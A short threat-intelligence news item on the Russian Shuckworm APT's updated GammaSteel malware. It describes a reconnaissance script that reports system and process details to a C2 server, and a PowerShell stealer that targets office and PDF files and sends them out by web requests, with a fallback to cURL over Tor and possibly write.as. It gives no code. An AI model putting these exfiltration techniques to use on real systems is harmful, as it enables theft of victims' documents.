Russian Shuckworm APT is back with updated GammaSteel malware

Posted on by

One script served as a reconnaissance tool collecting information about the computer, including system information, the name of security software running, available space on disks, the directory tree of the Desktop folder, and a list of all running processes. All this collected information was sent back to the C2 server.

New GammaSteel variant

The second script was a PowerShell version of GammaSteel that exfiltrated all files with certain extensions from specified directories such as Desktop, Download, and Documents. The targeted extensions included .doc, .docx, .xls, .xlsx, .ppt, .pptx, .vsd, .vsdx, .rtf, .odt, .txt and .pdf.

The new GammaSteel version uses PowerShell web requests to exfiltrate files, and if it fails, it then falls back to using the cURL command line tool with a Tor proxy to send data out. There is also code that suggests the web service write.as was potentially used as a fallback data exfiltration channel as well.